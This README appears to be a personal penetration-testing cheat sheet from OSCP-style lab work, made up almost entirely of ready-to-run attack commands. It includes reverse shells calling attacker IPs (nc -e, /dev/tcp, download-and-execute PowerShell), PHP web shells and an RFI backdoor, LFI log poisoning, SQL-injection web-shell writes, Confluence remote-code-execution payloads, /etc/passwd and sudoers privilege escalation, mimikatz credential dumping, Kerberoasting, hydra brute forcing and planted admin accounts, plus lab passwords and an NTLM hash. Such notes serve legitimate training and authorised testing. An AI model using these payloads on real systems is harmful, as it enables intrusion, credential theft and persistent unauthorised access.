└── README.md


/README.md:
--------------------------------------------------------------------------------
  1 | # Initial portscanning and web enum
  2 | 
  3 | Group hosts on file and scan for the web apps
  4 | ```
  5 | nmap -iL hosts --open -v -sV -p 80,443,8080,8000,5000 -oA initial-web -Pn -n
  6 | ```
  7 | 
  8 | Group hosts on file and scan for the most common ports
  9 | ```
 10 | nmap -iL hosts --open -v -sV -oA initial-1k -Pn -n -r 
 11 | ```
 12 | 
 13 | Scan the most common ports:
 14 | ```
 15 | nmap --open -vv host  -p 21,22,23,25,79,80,88,110,111,113,135,137,138,139,143,161,162,264,334,389,443,445,512,513,514,548,554,593,623,636,873,992,1022,1090,1098,1099,1311,1433,1521,1522-1529,1540,1541,1560,1801,2022,2049,2121,2222,2301,2375,2376,2381,3050,3128,3260,3299,3306,3389,4321,4444,4445,4786,4848,4990,5000,5985,5060,5432,5433,5555,5556,5800,5900,5984,5985,6000,6066,6129,6379,7000-7004,7070,7071,8000-8003,8006,8008,8009,8080,8081,8088,8090,8180,8181,8383,8400,8443,8500,8554,8686,8800,8880,8888,8983,9000,9001,9002,9003,9012,9100,9160,9200,9300,9443,9503,10000,10050,10051,10255,10999,11099,11111,11211,16379,26379,27017,27018,27019,28017,44818,45000,45001,47001,47002,50500 -oA host
 16 | ```
 17 | 
 18 | dont forget to scan udp ports
 19 | ```
 20 | sudo nmap -iL hosts --open -v -sU -p161 -oA udp
 21 | ```
 22 | 
 23 | ``` 
 24 | sudo nmap -iL hosts --open -v -sU -p69 -oA udp #tftp
 25 | ```
 26 | 
 27 | dont forget about winrm ports
 28 | ```
 29 | nmap -iL hosts --open -v -p5985 -oA winrm
 30 | ```
 31 | 
 32 | `gobuster dir -u "http://192.168.153.149" -w /usr/share/dirb/wordlists/common.txt -b 404,403`
 33 | 
 34 | httpx/aquaton?
 35 | 
 36 | ## Windows
 37 | 
 38 | Scan a single port
 39 | ```
 40 | Test-NetConnection -Port 445 172.16.124.102
 41 | ```
 42 | 
 43 | Scan multiple portsha
 44 | ``` powershell
 45 | 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("172.16.124.102", $_)) "TCP port $_ is open"} 2>$null
 46 | ```
 47 | 
 48 | ## Linux
 49 | 
 50 | ```
 51 | netcat -v -z -n -w 1 192.168.45.230 1-1023
 52 | ```
 53 | 
 54 | 
 55 | # Reverse Shell
 56 | 
 57 | ## Linux
 58 | 
 59 | ``` upgrade shell
 60 | python3 -c 'import pty; pty.spawn("/bin/bash")'
 61 | ```
 62 | 
 63 | ## Windows
 64 | 
 65 | Do Pth and execute powershell command to download and run reverse shell:
 66 | ```
 67 | iex(new-object net.webclient).downloadstring('http://192.168.45.230:8000/shell.ps1');shell
 68 | ```
 69 | 
 70 | Generate a exe payload using msfvenom:
 71 | ```
 72 | msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.45.179 LPORT=4444 -f exe -o meterpreter.exe
 73 | ```
 74 | 
 75 | # NC
 76 | 
 77 | 
 78 | ```
 79 | powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe
 80 | ```
 81 | ``
 82 | ```
 83 | C:\Windows\Temp\nc.exe -e cmd.exe 192.168.45.206 4446
 84 | ```
 85 | ## PHP
 86 | ```php
 87 | <html>
 88 | <body>
 89 | <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
 90 | <input type="TEXT" name="cmd" id="cmd" size="80">
 91 | <input type="SUBMIT" value="Execute">
 92 | </form>
 93 | <pre>
 94 | <?php
 95 |     if(isset($_GET['cmd']))
 96 |     {
 97 |         system($_GET['cmd']);
 98 |     }
 99 | ?>
100 | </pre>
101 | </body>
102 | <script>document.getElementById("cmd").focus();</script>
103 | </html>
104 | ```
105 | 
106 | # File Exchange
107 | 
108 | ## Linux
109 | 
110 | Host smb server with credentials
111 | ```
112 |  sudo smbserver.py share . -smb2support -username user -password P@ssw0rd
113 | ```
114 | 
115 | Mount a smb share
116 | ```
117 | mount -t cifs -o "username=michelle,password=NotMyPassword0k?" //172.16.120.21/apps /mnt/
118 | ```
119 | 
120 | Host webdav server
121 | ```
122 | wsgidav --host=0.0.0.0  --port=8080 --auth=anonymous --root .
123 | ```
124 | 
125 | ## Windows
126 | 
127 | download a file using iwr
128 | ```
129 | certutil.exe -urlcache -f http://192.168.45.230:8000/winPEASx64.exe winPEASx64.exe
130 | 
131 | iwr -uri http://192.168.45.179:8000/chisel.exe -Outfile chisel.exe
132 | 
133 | iwr -uri http://192.168.49.103:8000/mimikatz.exe -Outfile mimikatz.exe
134 | 
135 | iwr -uri http://192.168.49.103:8000/agent.exe -Outfile agent.exe
136 | 
137 | iwr -uri http://192.168.49.103:8000/winPEASx64.exe -Outfile winPEASx64.exe
138 | 
139 | iwr -uri http://192.168.45.241:8000/PowerView.ps1 -Outfile PowerView.ps1
140 | 
141 | iwr -uri http://192.168.45.246:8000/PowerUp.ps1 -Outfile PowerUp.ps1
142 | 
143 | iwr -uri http://192.168.49.124:8000/winPEAS.bat -outfile winPEAS.bat
144 | 
145 | iwr -uri http://192.168.49.103:8000/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe
146 | 
147 | iwr -uri http://192.168.49.103:8000/GodPotato.exe -Outfile GodPotato.exe
148 | 
149 | iwr -uri http://192.168.49.103:8000/nc.exe -Outfile nc.exe
150 | 
151 | iwr -uri http://192.168.45.241:8000/reverse.exe -Outfile reverse.exe
152 | 
153 | 
154 | iwr -uri http://192.168.45.241:8000/SharpHound.ps1 -Outfile SharpHound.ps1
155 | 
156 | iwr -uri http://192.168.49.124:8000/SharpHound.exe -Outfile SharpHound.exe
157 | 
158 | iwr -uri http://192.168.45.172:8000/Procmon.exe -Outfile Procmon.exe
159 | 
160 | iwr -uri http://192.168.45.241:8000/WSuspicious.exe -Outfile WSuspicious.exe
161 | ```
162 | 
163 | 
164 | Connect to smb share using password
165 | ```
166 | net use H: "\\192.168.49.103\share" P@ssw0rd /user:user
167 | ```
168 | 
169 | # OS Enumeration  and LPE
170 | 
171 | 
172 | ## Freebsd
173 | 
174 | open ports
175 | ```
176 | netstat -an -p tcp
177 | sockstat -P tcp
178 | ```
179 | 
180 | Installed software
181 | ```
182 | pkg info
183 | ```
184 | 
185 | Check groups
186 | ```
187 | cat /etc/group
188 | ```
189 | 
190 | Show services
191 | ```
192 | service -l
193 | ```
194 | 
195 | Check doas.conf
196 | ```
197 | cat /usr/local/etc/doas.conf
198 | ```
199 | 
200 | ## Windows 
201 | 
202 | Find uncommon services
203 | ```
204 | Get-CimInstance -ClassName win32_service | Select Name,State,PathName |findstr -i -V "system32"
205 | ```
206 | 
207 | ```
208 | wmic service get name,pathname |findstr -i -V "system32" | findstr -V "^$" 
209 | ```
210 | 
211 | ```
212 | schtasks /query /fo LIST /v  |findstr -i "Run:" | findstr -v "COM handler" | findstr -i -v system32
213 | ```
214 | 
215 | General System info:
216 | ```
217 | Get-LocalUser
218 | Get-LocalGroup
219 | Get-LocalGroupMember Administrators
220 | Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname 
221 | Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
222 | Get-Process | ForEach-Object {$_.Path} 
223 | Get-History
224 | (Get-PSReadlineOption).HistorySavePath
225 | 
226 | ```
227 | 
228 | ```
229 | net user /domain
230 | 
231 | $env.AppKey
232 | cmdkey /list
233 | ipconfig
234 | netstat -ano -p tcp
235 | whoami /all
236 | Get-ChildItem *.txt *.zip -recurse -ErrorAction SilentlyContinue -Force
237 | Get-ChildItem C:\Users\offsec\AppData *.txt -recurse -ErrorAction SilentlyContinue -Force
238 | 
239 | Get-Process
240 |  .\winPEASx64.exe log
241 |  .\winPEAS.bat log
242 | ```
243 | 
244 | show kerberos tickets
245 | `klist`
246 | 
247 | Check putty session
248 | ```
249 | reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
250 | ```
251 | 
252 | CheckPowershell History
253 | ```
254 | Get-ChildItem "ConsoleHost_history.txt" -recurse -ErrorAction SilentlyContinue -Force
255 | (Get-PSReadlineOption).HistorySavePath
256 | ```
257 | 
258 | Download and run PowerUP
259 | ```
260 | IEX (New-Object Net.WebClient).DownloadString('http://192.168.45.230:8000/PowerUp.ps1'); PowerUp
261 | ```
262 | 
263 | Download and run Powerview
264 | ```
265 | IEX (New-Object Net.WebClient).DownloadString('http://192.168.45.230:8000/PowerView.ps1'); PowerView
266 | ```
267 | 
268 | ```
269 | schtasks /query /fo LIST /v
270 | ```
271 | 
272 | Start a service
273 | ```
274 | powershell -c "Start-Service -Name AuditTracker"
275 | ```
276 | 
277 | Get a list of Scheduled tasks
278 | ```
279 | Get-ScheduledTask
280 | ```
281 | 
282 | Get a list of services
283 | ```
284 | Get-Service
285 | ```
286 | 
287 | Restart a service 
288 | ```
289 | restart-service schedule
290 | ```
291 | Start a service
292 | ```
293 | start-service
294 | ```
295 | 
296 | Monitor a difference in output
297 | ```
298 | # https://raw.githubusercontent.com/markwragg/PowerShell-Watch/master/Watch/Public/Watch-Command.ps1
299 | Get-Service | Watch-Command -Diff -Cont
300 | ```
301 | 
302 | PrintSpoofer reverse shell
303 | ```
304 | .\PrintSpoofer64.exe -c "c:\Temp\nc.exe 192.168.45.246 8001 -e cmd"
305 | .\PrintSpoofer64.exe -c "reverse.exe"
306 | ```
307 | 
308 | GodPotato Reverse shell
309 | ```
310 | .\GodPotato.exe -cmd "nc.exe -e cmd.exe 192.168.45.230 4444"
311 | 
312 | .\Godpotato.exe -cmd "reverse.exe"
313 | ```
314 | 
315 | ### PowerUp
316 | 
317 | ```
318 | powershell -ep bypass
319 | powershell -c "Import-Module .\PowerUp.ps1"
320 | Get-ModifiableServiceFile
321 | Get-UnquotedService
322 | ```
323 | 
324 | ## Linux
325 | 
326 | check running processes
327 | ```
328 | ps aux
329 | ```
330 | 
331 | Read all the cronjobs
332 | 
333 | ```
334 | cat /etc/cron*
335 | ```
336 | 
337 | check cron logs
338 | ```
339 | grep "CRON" /var/log/syslog
340 | ```
341 | 
342 | Find SUID binaries
343 | ```
344 | find / -perm -u=s -type f 2>/dev/null
345 | ```
346 | 
347 | find files with read as user access
348 | ```
349 | find / -user stuart  2>/dev/null  | grep -v -e proc -e systemd -e cgroup
350 | ```
351 | 
352 | find writable 
353 | ```
354 | find / -writable -type d 2>/dev/null
355 | ```
356 | 
357 | Find binaries with capabilities
358 | ```
359 | /usr/sbin/getcap -r / 2>/dev/null
360 | ```
361 | 
362 | Download PwnKit 
363 | ```
364 | wget 192.168.49.103:8000/PwnKit
365 | ```
366 | 
367 | Download and execute linpeas 
368 | ```
369 | curl 192.168.49.103:8000/linpeas.sh | sh | tee result
370 | ```
371 | 
372 | Check groups
373 | ```
374 | cat /etc/group
375 | ```
376 | 
377 | iptables rules
378 | ```
379 | cat /etc/iptables/rules.v4
380 | ```
381 | 
382 | writable pass file
383 | ```
384 | ls -lah /etc/passwd
385 | openssl passwd w00t -> Fdzt.eqJQ4s0g
386 | echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd
387 | su root2
388 | ```
389 | 
390 | LPE tar wildcard expansion
391 | ```
392 | echo "echo 'cassie ALL=(root) NOPASSWD: ALL' >> /etc/sudoers" > privesc.sh
393 | echo "" > '--checkpoint=1'
394 | echo "" > '--checkpoint-action=exec=sh privesc.sh'
395 | ```
396 | 
397 | 
398 | # Pivoting
399 | 
400 | ## Chisel
401 | Run as client (attacker)
402 | ```
403 | ./chisel client 192.168.249.121:8080 socks
404 | ```
405 | 
406 | run as server (compromised host)
407 | ```
408 | .\chisel.exe server --socks5
409 | ```
410 | 
411 | ## Ligolo (better)
412 | 
413 | ```
414 | Run proxy as a server (attacker)
415 | 
416 | # Setup routes
417 | sudo ip route add 192.168.0.0/24 dev ligolo
418 | 
419 | # Optional (make sure interface exist and activate it)
420 | sudo ip tuntap add user username mode tun ligolo
421 | sudo ip link set ligolo up
422 | 
423 | ligolo-proxy -selfcert
424 | 
425 | ```
426 | 
427 | run agent as a client (compromised host)
428 | ```
429 | .\agent.exe -connect 192.168.49.103:11601 -ignore-cert
430 | ```
431 | 
432 | ## Socat
433 | 
434 | Forward local port 2345 to 10.4.50.215:5432
435 | ```
436 | socat -ddd TCP-LISTEN:2222,fork TCP:10.4.196.215:22
437 | ```
438 | 
439 | ## SSH 
440 | 
441 | Remote port forwarding (from compomised host to attacker machine to get to the deeper network on single host+port)
442 | ```
443 | ssh -N -R 0.0.0.0:4444:10.4.218.215:4444 oscp@192.168.45.206
444 | ```
445 | 
446 | Remote dynamic port forward (from compomised host to attacker machine to get to the deeper network dynamicly)
447 | ```
448 | ssh -N -R 9998 oscp@192.168.45.206
449 | ```
450 | 
451 | ## Plink
452 | 
453 | ```
454 | C:\Windows\Temp\plink.exe -ssh -l oscp -pw oscp -R 127.0.0.1:9833:127.0.0.1:3389 192.168.45.206
455 | ```
456 | 
457 | 
458 | # Active Directory
459 | 
460 | ## Enumeration 
461 | 
462 | Download and run Sharphound
463 | ```powershell
464 | IEX (New-Object Net.WebClient).DownloadString('http://192.168.49.124:8000/SharpHound.ps1'); Invoke-BloodHound -c All -s
465 | ```
466 | 
467 | Run rusthound from linux box
468 | ``` bash
469 | proxychains ./rusthound -i 172.16.184.10 -u joe -p Flowers1  --domain medtech.com
470 | ```
471 | 
472 | ## Kerberos
473 | 
474 | Kerberoasting
475 | ```
476 | netexec ldap  10.10.207.140 -u celia.almeda -p "7k8XHk3dMtmpnC7" --kerberoasting KERBEROASTING
477 | ```
478 | 
479 | ```
480 | Rubeus.exe kerberoast /outfile:hashes.txt
481 | ```
482 | 
483 | ASREProasting
484 | ```
485 | netexec ldap  10.10.207.140 -u celia.almeda -p "7k8XHk3dMtmpnC7"  --asreproast ASREPROAST
486 | ```
487 | 
488 | # Generic Windows
489 | 
490 | Connect to compromised host via winrm
491 | ```
492 |  evil-winrm -i 192.168.224.121 -u administrator -H "b2c03054c306ac8fc5f9d188710b0168"
493 | ```
494 | 
495 | 
496 | Connect to compromised host via rdp
497 | ```
498 | xfreerdp /v:172.16.234.12:3389 /u:yoshi /p:"Mushroom\!" /cert-ignore /d:medtech.com /compression /drive:shared,/home/username/EDUCATION/OSCP/
499 | ```
500 | 
501 | Command execution via psexec
502 | ```
503 | psexec.py medtech.com/leon:"rabbit:)"@172.16.234.10
504 | ```
505 | 
506 | # Post Exploitation 
507 | 
508 | ## Windows Persistance
509 | 
510 | ```
511 | net user /add curiv P@ssw0rd
512 | net localgroup administrators curiv /add
513 | ```
514 | 
515 | ## Windows 
516 | 
517 | ```
518 | .\mimikatz.exe "token::elevate" "log lsadump::lsa /inject" exit
519 | .\mimikatz.exe "token::elevate" "lsadump::secrets" exit
520 | .\mimikatz.exe "token::elevate" "lsadump::sam" exit
521 | .\mimikatz.exe "lsadump::sam /system:C:\windows.old\Windows\System32\SYSTEM /sam:C:\windows.old\Windows\System32\SAM" exit 
522 | .\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"
523 | 
524 | 
525 | ```
526 | 
527 | # Password attacks
528 | 
529 | ## Bruteforce
530 | 
531 | ssh
532 | ```
533 | hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201
534 | ```
535 | 
536 | rdp 
537 | 
538 | ```
539 | hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202
540 | ```
541 | 
542 | http-post
543 | ```
544 | hydra -l user -P ~/wordlists/PASSWORDS/rockyou.txt 192.168.196.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
545 | ```
546 | 
547 | http-basic
548 | ```
549 | hydra -l admin -P ~/wordlists/PASSWORDS/rockyou.txt -s 80 -f 192.168.196.201 http-get
550 | ```
551 | 
552 | # Databases
553 | 
554 | ## MSSQL
555 | 
556 | connect and execute querries
557 | ```
558 | netexec mssql 192.168.242.248 -u emma -p "SomersetVinyl1\!" --port 49965 -q "select @@version;
559 | ```
560 | 
561 | Enable command execution
562 | 1. connect to host `impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth`
563 | 2. `EXECUTE sp_configure 'show advanced options', 1;`
564 | 3. `RECONFIGURE;`
565 | 4. `EXECUTE sp_configure 'xp_cmdshell', 1;`
566 | 5. `RECONFIGURE;`
567 | 
568 | FIleupload and reverse shell after
569 | ```
570 | netexec mssql 10.10.113.148 -u sql_svc -p "Dolphin1" --put-file nc.exe C:\Windows\Temp\nc.exe
571 | ```
572 | 
573 | ```
574 | netexec mssql 10.10.113.148 -u sql_svc -p "Dolphin1" -x "C:\Windows\Temp\nc.exe 10.10.113.147 4444 -e cmd.exe"
575 | ```
576 | 
577 | ## Mongo
578 | 
579 | connect to mongo db
580 | ```
581 | mongosh 172.16.203.30
582 | ```
583 | 
584 | ## MySQL
585 | 
586 | ```
587 | 
588 | ```
589 | 
590 | 
591 | # SNMP
592 | 
593 | Bruteforce SNMP community
594 | ```
595 | sudo onesixtyone 192.168.165.145
596 | ```
597 | 
598 | SNMP base enum nmap
599 | `sudo nmap 192.168.213.156 -sU -p161 --script="snmp*" -v`
600 | 
601 | SNMP User Enumeration
602 | `sudo nmap 192.168.165.145 -sU -p161 --script=snmp-win32-users`
603 | 
604 | netstat enum
605 | ` sudo nmap 192.168.165.145 -sU -p161 --script=snmp-netstat`
606 | 
607 | general dump
608 | ```
609 | snmpbulkwalk -c public -v2c 192.168.213.156
610 | ```
611 | 
612 | software enum
613 | ```
614 | snmpwalk -c public -v1 192.168.153.149 1.3.6.1.2.1.25.6.3.1.2
615 | ```
616 | 
617 | open ports
618 | ``` 
619 | snmpwalk -c security 192.168.103.110 1.3.6.1.2.1.6.13.1.3 -v2c
620 | ```
621 | 
622 | extended output
623 | ```
624 | snmpwalk -c security 192.168.103.110 NET-SNMP-EXTEND-MIB:nsExtendOutputFill -v2c
625 | ```
626 | 
627 | # WEB
628 | 
629 | ## File Upload
630 | 
631 | Inject responder UNC in a filename header of multipart HTTP POST request
632 | ```
633 | Content-Disposition: form-data; name="myFile"; filename="\\\\192.168.45.206\\test"
634 | ```
635 | 
636 | ## Confluence RCE
637 | 
638 | ```
639 | curl http://192.168.218.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/
640 | 192.168.45.206/4444%200%3E%261%27%29.start%28%29%22%29%7D/ -v
641 | ```
642 | ## Apache RCE
643 | 
644 | Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
645 | 
646 | https://www.exploit-db.com/exploits/50383
647 | 
648 | ## LFI Log poisoning
649 | 
650 | Poison a log by injecting UserAgent (linux)
651 | ```
652 | GET /meteor/index.php?page=../../../../../../../var/log/apache2/access.log HTTP/1.1
653 | Host: 192.168.196.16
654 | User-Agent: pentest <?php echo system($_GET['cmd']); ?>
655 | Accept: */*
656 | ```
657 | 
658 | Poison a log by injecting UserAgent (windows)
659 | ```
660 | GET /meteor/index.php?page=../../../../../../xampp\apache\logs\access.log HTTP/1.1
661 | Host: 192.168.196.193
662 | User-Agent: pentest <?php echo system($_GET['cmd']); ?>
663 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
664 | ```
665 | 
666 | Execute commands providing cmd get parameter (adjust log path accoding to your IOS)
667 | 
668 | ```
669 | GET /meteor/index.php?page=../../../../../../../var/log/apache2/access.log&cmd=ps HTTP/1.1
670 | Host: 192.168.196.16
671 | User-Agent: pentest <?php echo system($_GET['cmd']); ?>
672 | Accept: */*
673 | Connection: keep-alive
674 | ```
675 | 
676 | 
677 | 
678 | Send a reverse shell (encoded payload `bash -c "bash -i >& /dev/tcp/192.168.45.241/8001 0>&1"`)
679 | ```
680 | GET /meteor/index.php?page=../../../../../../../var/log/apache2/access.log&cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.241%2F8001%200%3E%261%22 HTTP/1.1
681 | Host: 192.168.196.16
682 | User-Agent: pentest <?php echo system($_GET['cmd']); ?>
683 | Accept: */*
684 | Connection: keep-alive
685 | ```
686 | 
687 | 
688 | ## LFI PHP wrappers
689 | 
690 | Base64 encode php code via `php://filter` wrapper and output as a text
691 | 
692 | ```
693 | http://192.168.196.16/meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php
694 | ```
695 | 
696 | Command execution via `data://` wrapper
697 | ```
698 | curl "http://192.168.196.16/meteor/index.php?page=data://text/plain,<?php%20echo%20system('ls');?>"
699 | ```
700 | 
701 | Command execution with `system` bypass via base64 encoding
702 | ```
703 | curl "http://192.168.196.16/meteor/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls"
704 | ```
705 | 
706 | ## RFI
707 | 
708 | simple-backdoor.php
709 | ```php 
710 | <?php
711 | if(isset($_REQUEST['cmd'])){
712 |         echo "<pre>";
713 |         $cmd = ($_REQUEST['cmd']);
714 |         system($cmd);
715 |         echo "</pre>";
716 |         die;
717 | }
718 | ?>
719 | ```
720 | 
721 | Include php file and provide a command to execute
722 | ```
723 | curl "http://192.168.196.16/meteor/index.php?page=http://192.168.45.241/simple-backdoor.php&cmd=ls"
724 | ```
725 | 
726 | 
727 | ## RCE
728 | 
729 | Linux based using `nc -c` payload
730 | `Archive=2ip.ru%3Bnc%20-c%20bash%20192.168.45.241%2080`
731 | 
732 | ## SQLi
733 | 
734 | Authentication bypass
735 | 
736 | ````
737 | offsec' OR 1=1 -- //
738 | ````
739 | 
740 | Time-based blind
741 | ```
742 |  offsec' AND IF (1=1, sleep(3),'false') -- //
743 | ```
744 | 
745 | WebShell (identify the number of columns before)
746 | 
747 | ```
748 | ' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null INTO OUTFILE "/var/www/html/tmp/webshell1.php" -- //
749 | ```
750 | 
751 | Error-based SQLi
752 | ```
753 | ' or 1=1 in (select @@version) -- //
754 | ```
755 | 
756 | PSQL RCE
757 | ```
758 | weight=1&height=1'; CREATE TABLE shell(output text); -- //&age=1&gender=Male&email=test%40test.com
759 | ```
760 | 
761 | 
762 | ## Confluence RCE 
763 | 
764 | download chisel
765 | ```
766 | curl http://192.168.196.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilde
767 | r%28%29.command%28%27bash%27%2C%27-c%27%2C%27wget%20192.168.45.241/chisel%20-O%20/tmp/chisel%20%26%26%20chmod%20%2Bx%20/tmp/chisel%27%29.start%28%29%22%29%7D
768 | ```
769 | 
770 | connect to server
771 | ```
772 | curl http://192.168.196.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilde
773 | r%28%29.command%28%27bash%27%2C%27-c%27%2C%27/tmp/chisel%20client%20192.168.45.241:8080%20R:socks%27%29.start%28%29%22%29%7D/
774 | ```
775 | 
776 | reverse shell
777 | ```
778 | curl http://192.168.196.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.241/443%200%3E%261%27%29.start%28%29%22%29%7D/
779 | ```


--------------------------------------------------------------------------------